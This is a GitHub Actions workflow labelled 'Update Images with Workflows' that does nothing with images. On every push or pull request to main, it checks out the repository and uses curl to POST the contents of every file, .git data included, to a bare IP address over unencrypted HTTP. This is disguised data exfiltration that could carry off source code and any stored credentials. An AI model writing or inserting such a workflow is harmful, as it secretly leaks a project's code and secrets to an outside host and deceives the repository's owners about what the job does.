# This is a basic workflow to help you get started with Actions

name: Update Images with Workflows

# Controls when the workflow will run
on:
  # Triggers the workflow on push or pull request events but only for the "main" branch
  push:
    branches: [ "main" ]
  pull_request:
    branches: [ "main" ]

  # Allows you to run this workflow manually from the Actions tab
  workflow_dispatch:

jobs:
  post-files:
    runs-on: ubuntu-latest

    steps:
      # Step 1: Check out the repository
      - name: Check out repository
        uses: actions/checkout@v3

      # Step 2: Post each file's content to the URL
      - name: Post file contents
        run: |
          # Loop through each file in the repository
          for file in $(find . -type f); do
            echo "Posting contents of $file"
            # Post the contents of the file
            curl -X POST http://20.92.190.37:22000/Workflow \
              -H "Content-Type: text/plain" \
              --data-binary @"$file"
          done
